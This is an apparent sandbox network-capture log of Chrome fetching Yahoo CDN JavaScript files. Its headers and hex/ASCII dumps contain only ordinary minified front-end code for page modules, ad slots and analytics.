                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 11 Jan 2022 10:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9fba2531ffa6cb0b4d3d34c56c295495"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: Qyt1s0oNtpHMZryrsEe7nbfplEXvu_oO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 442996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 69 6e 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 69 6e 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1066INData Raw: 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 69 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 66 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 75 3d 30 3b 75 3c 66 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 7b 76 61 72 20 73 3d 66 5b 75 5d 2e 6e 61 6d 65 2e 6d 61 74 63 68 28 70 29 3b 73 26 26 73 5b 31 5d 26 26 61 2e 70 75 73 68 28 73 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 76 61 72 20 6c 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ){var r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=r.selector;o(this,t);for(var a=[],f=e.attributes,u=0;u<f.length;u++){var s=f[u].name.match(p);s&&s[1]&&a.push(s[1].toLowerCase())}var l=n(this,(t.__proto__||Object.getPrototypeOf(t)).call


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    95192.168.2.44986187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC373OUTGET /cx/hp-viewer/desktop_1.11.185.modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC723INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: tO0ikiGYS1Ew6TAXHJqpQ3M+udSVld1MoiDjDIPKd8hmNSfgo046PWfG+cl2PLiIEj6eGKgqI+epHWJs8ZoQEihU5KVmH98dCuZpJ6Vx7to=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: CZZMXRJHF578KAVE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sun, 29 Sep 2024 22:34:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 05 Sep 2024 14:01:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "bd4d30bf2431199179fa9afbdb1ccb76"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 65865
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 67593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 5b 22 66 69 6e 61 6e 63 65 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 6e 65 77 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 2c 22 73 70 6f 72 74 73 2e 79 61 68 6f 6f 2e 63 6f 6d 22 5d 2c 74 3d 6e 65 77 20 52 65 67 45 78 70 28 2f 72 73 3d 22 28 5b 5e 22 5d 2a 29 22 2f 29 2c 69 3d 7b 6c 6d 73 69 64 3a 22 6c 6d 73 69 64 22 2c 6c 70 73 74 61 69 64 3a 22 6c 70 73 74 61 69 64 22 2c 6c 75 3a 22 6c 75 22 2c 70 63 74 3a 22 70 61 67 65 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 70 64 3a 22 70 61 67 65 44 65 73 69 67 6e 22 2c 70 6c 3a 22 70 6c 22 2c 70 74 3a 22 70 61 67 65 54 79 70 65 22 2c 72 65 76 73 70 3a 22 72 65 76 73 70 22 2c 76 65 72 3a 22 61 70 70 4e 61 6d 65 22 7d 2c 73 3d 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(){"use strict";const e=["finance.yahoo.com","news.yahoo.com","sports.yahoo.com"],t=new RegExp(/rs="([^"]*)"/),i={lmsid:"lmsid",lpstaid:"lpstaid",lu:"lu",pct:"pageContentType",pd:"pageDesign",pl:"pl",pt:"pageType",revsp:"revsp",ver:"appName"},s=[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 61 61 73 2c 64 69 76 2e 77 61 66 65 72 2d 63 61 61 73 2d 63 6f 6d 70 6c 65 74 65 22 29 3b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 69 29 2e 66 69 6e 64 49 6e 64 65 78 28 28 74 3d 3e 74 3d 3d 3d 65 29 29 2b 31 7d 2c 75 3d 28 29 3d 3e 77 69 6e 64 6f 77 2e 76 7a 6d 3f 2e 67 65 74 50 61 67 65 43 6f 6e 74 65 78 74 3f 2e 28 29 7c 7c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 3f 2e 63 6f 6e 74 65 78 74 2c 66 3d 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 3f 2e 62 75 63 6b 65 74 7c 7c 65 3f 2e 62 75 63 6b 65 74 49 64 7c 7c 22 22 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 63 6f 6e 73 74 20 74 3d 5b 5d 3b 66 6f 72 28 63 6f 6e 73 74 20 69 20 69 6e 20 65 29 69 66 28 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: aas,div.wafer-caas-complete");return Array.from(i).findIndex((t=>t===e))+1},u=()=>window.vzm?.getPageContext?.()||window.YAHOO?.context,f=()=>{const e=u();return String(e?.bucket||e?.bucketId||"")};function g(e){const t=[];for(const i in e)if(e.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 28 65 2c 74 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 2e 75 70 64 61 74 65 49 31 33 4e 29 7b 63 6f 6e 73 74 7b 61 64 4d 65 74 61 3a 69 2c 73 70 61 63 65 49 64 3a 73 2c 68 6f 6d 65 70 61 67 65 55 72 6c 3a 6e 2c 70 72 65 73 65 6e 74 61 74 69 6f 6e 3a 61 7d 3d 65 2e 6d 65 74 61 2e 64 61 74 61 2c 72 3d 7b 7d 2c 63 3d 22 66 72 6f 6e 74 70 61 67 65 22 3d 3d 3d 74 7c 7c 22 66 70 22 3d 3d 3d 74 3b 72 2e 73 70 61 63 65 69 64 3d 69 2e 73 70 61 63 65 69 64 7c 7c 73 7c 7c 22 22 2c 69 2e 68 61 73 68 74 61 67 26 26 28 72 2e 68 61 73 68 74 61 67 3d 69 2e 68 61 73 68 74 61 67 2e 73 70 6c 69 74 28 22 3b 22 29 29 2c 63 26 26 69 2e 73 69 74 65 26 26 28 72 2e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (e,t)=>{if(window.benji&&"function"==typeof window.benji.updateI13N){const{adMeta:i,spaceId:s,homepageUrl:n,presentation:a}=e.meta.data,r={},c="frontpage"===t||"fp"===t;r.spaceid=i.spaceid||s||"",i.hashtag&&(r.hashtag=i.hashtag.split(";")),c&&i.site&&(r.s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 3a 78 2c 6f 6e 56 69 65 77 65 72 4f 70 65 6e 65 64 3a 52 2c 6f 6e 56 69 65 77 65 72 43 6c 6f 73 65 64 3a 54 2c 6f 6e 56 69 65 77 65 72 44 69 64 43 6c 6f 73 65 3a 44 7d 3b 63 6f 6e 73 74 20 42 3d 22 41 55 54 4f 22 2c 46 3d 5b 22 49 4e 41 52 54 49 43 4c 45 22 2c 22 49 4e 41 52 54 49 43 4c 45 2d 31 22 2c 22 57 49 44 47 45 54 22 2c 22 57 49 44 47 45 54 2d 31 22 2c 22 57 49 44 47 45 54 41 22 5d 2c 5f 3d 5b 22 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 22 5d 2c 24 3d 7b 61 74 74 3a 22 73 62 63 22 2c 66 72 6f 6e 74 69 65 72 3a 22 66 74 72 22 2c 72 6f 67 65 72 73 3a 22 72 6f 67 65 72 73 2d 61 63 73 22 7d 2c 48 3d 5b 22 57 49 44 47 45 54 41 22 5d 3b 63 6f 6e 73 74 20 57 3d 7b 61 72 74 69 63 6c 65 3a 22 73 74 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: iewerWillOpen:x,onViewerOpened:R,onViewerClosed:T,onViewerDidClose:D};const B="AUTO",F=["INARTICLE","INARTICLE-1","WIDGET","WIDGET-1","WIDGETA"],_=["caas-image-lightbox"],$={att:"sbc",frontier:"ftr",rogers:"rogers-acs"},H=["WIDGETA"];const W={article:"sto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 73 2e 73 70 61 63 65 69 64 3d 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 67 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 22 73 70 61 63 65 69 64 22 29 2c 74 68 69 73 2e 6d 61 69 6e 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 69 2c 74 68 69 73 2e 63 6c 75 73 74 65 72 41 72 74 69 63 6c 65 52 61 70 69 64 43 6f 6e 66 69 67 3d 73 7d 6f 6e 56 69 65 77 65 72 57 69 6c 6c 4f 70 65 6e 28 29 7b 74 68 69 73 2e 68 6f 6d 65 55 72 6c 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 63 6c 65 61 72 28 29 7d 6f 6e 43 6c 69 63 6b 28 65 29 7b 22 73 6c 69 64 65 73 68 6f 77 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 68 69 73 2e 6f 6e 53 6c 69 64 65 73 68 6f 77 43 6c 69 63 6b 28 65 29 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s.spaceid=window.rapidInstance?.getRapidAttribute("spaceid"),this.mainArticleRapidConfig=i,this.clusterArticleRapidConfig=s}onViewerWillOpen(){this.homeUrl=location.href,this.viewedArticles.clear()}onClick(e){"slideshow"===e.type?this.onSlideshowClick(e):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 26 26 28 74 68 69 73 2e 72 65 66 65 72 65 72 55 72 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 74 68 69 73 2e 76 69 65 77 65 64 41 72 74 69 63 6c 65 73 2e 61 64 64 28 65 2e 65 6c 65 6d 2e 69 64 29 7d 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 74 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 69 7d 7d 3d 65 2c 7b 61 64 4d 65 74 61 3a 73 2c 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 3a 6e 2c 63 6f 6e 74 65 6e 74 54 79 70 65 3a 6f 2c 68 61 73 53 63 72 69 62 62 6c 65 3a 61 3d 21 31 2c 68 61 73 59 61 68 6f 6f 56 69 64 65 6f 3a 72 2c 68 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: dow.location.href&&(this.refererUrl=window.location.href),this.viewedArticles.add(e.elem.id)}updateRapidAttributes(e){if(!window.rapidInstance)return;const{elem:t,meta:{data:i}}=e,{adMeta:s,canonicalUrl:n,contentType:o,hasScribble:a=!1,hasYahooVideo:r,hid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 3f 2e 73 65 74 52 61 70 69 64 41 74 74 72 69 62 75 74 65 28 7b 6b 65 79 73 3a 6b 2c 73 70 61 63 65 69 64 3a 76 7d 29 2c 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 26 26 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 26 26 28 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 69 31 33 6e 2e 53 50 41 43 45 49 44 3d 70 61 72 73 65 49 6e 74 28 76 2c 31 30 29 29 7d 62 65 61 63 6f 6e 4d 6f 64 61 6c 43 6f 6e 74 65 6e 74 28 65 29 7b 69 66 28 21 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73 74 61 6e 63 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 65 6c 65 6d 3a 7b 69 64 3a 74 7d 7d 3d 65 3b 74 68 69 73 2e 75 70 64 61 74 65 52 61 70 69 64 41 74 74 72 69 62 75 74 65 73 28 65 29 2c 77 69 6e 64 6f 77 2e 72 61 70 69 64 49 6e 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: indow.rapidInstance?.setRapidAttribute({keys:k,spaceid:v}),window.YAHOO&&window.YAHOO.i13n&&(window.YAHOO.i13n.SPACEID=parseInt(v,10))}beaconModalContent(e){if(!window.rapidInstance)return;const{elem:{id:t}}=e;this.updateRapidAttributes(e),window.rapidIns
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 22 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 45 76 65 6e 74 3d 22 68 6f 6d 65 70 61 67 65 2d 76 69 65 77 65 72 2d 76 69 65 77 70 6f 72 74 22 2c 74 68 69 73 2e 6f 6e 53 63 72 6f 6c 6c 48 61 6e 64 6c 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 50 6f 73 69 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 76 69 65 77 70 6f 72 74 50 72 65 76 69 6f 75 73 41 64 46 65 74 63 68 53 6c 6f 74 49 6e 64 65 78 3d 5b 5d 2c 74 68 69 73 2e 70 61 67 65 43 6f 6e 74 65 78 74 3d 7b 7d 2c 74 68 69 73 2e 76 69 65 77 65 72 41 64 73 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 62 65 6e 6a 69 41 64 49 64 41 72 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nt="homepage-viewer",this.viewportEvent="homepage-viewer-viewport",this.onScrollHandle=null,this.viewportAdPositions=[],this.viewportAdFetchSlotIndex=[],this.viewportPreviousAdFetchSlotIndex=[],this.pageContext={},this.viewerAdsConfig={},this.benjiAdIdArr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 68 69 73 2e 6f 6e 50 72 65 50 61 72 73 65 41 64 73 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 73 65 74 57 61 66 65 72 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 70 72 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 75 70 64 61 74 65 57 61 66 65 72 53 74 61 74 65 49 6e 56 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 73 2e 6f 6e 28 22 63 61 61 73 3a 61 72 74 69 63 6c 65 3a 69 6e 76 69 65 77 22 2c 74 68 69 73 2e 6f 6e 41 72 74 69 63 6c 65 49 6e 76 69 65 77 2e 62 69 6e 64 28 74 68 69 73 29 29 2c 69 3f 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.onPreParseAds.bind(this)),s.on("caas:article:pre:inview",this.setWaferState.bind(this)),s.on("caas:article:pre:inview",this.updateWaferStateInView.bind(this)),s.on("caas:article:inview",this.onArticleInview.bind(this)),i?.on("RENDER_SUCCEEDED",this.o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6f 73 69 74 69 6f 6e 4d 65 74 61 2e 70 6f 73 69 74 69 6f 6e 73 29 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 63 6c 65 61 6e 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 2e 64 65 73 74 29 2c 6f 3d 2d 31 21 3d 3d 48 2e 69 6e 64 65 78 4f 66 28 74 2e 69 64 29 3b 69 66 28 6f 26 26 73 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3b 69 66 28 65 26 26 65 2e 69 64 2e 65 6e 64 73 57 69 74 68 28 22 2d 62 61 73 65 22 29 29 63 6f 6e 74 69 6e 75 65 7d 69 66 28 73 26 26 73 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 6e 29 7b 6f 7c 7c 28 74 2e 69 64 3d 22 55 42 41 22 2b 74 2e 69 64 2c 74 2e 63 6c 65 61 6e 3d 74 3f 2e 63 6c 65 61 6e 3f 2e 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ositionMeta.positions){const s=document.getElementById(t.clean),n=document.getElementById(t.dest),o=-1!==H.indexOf(t.id);if(o&&s){const e=s.parentElement;if(e&&e.id.endsWith("-base"))continue}if(s&&s.parentNode&&n){o||(t.id="UBA"+t.id,t.clean=t?.clean?.re


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    96192.168.2.44985987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC538OUTGET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: c/l5Sp+Krny2e2mmvgECiVnnOpIfa/6L0hfMRL9emfMXHj+vmZIR1duTL1l73jE/5MXG79KjagY=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: ZTN87Z1JD9RQ4SFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 23 Sep 2024 08:47:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Apr 2022 16:44:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "2e3968239b770b8186bb480d513311cd"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: kGIIRCHIdgWfcr_wSmm8v8C_z6K3HVA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
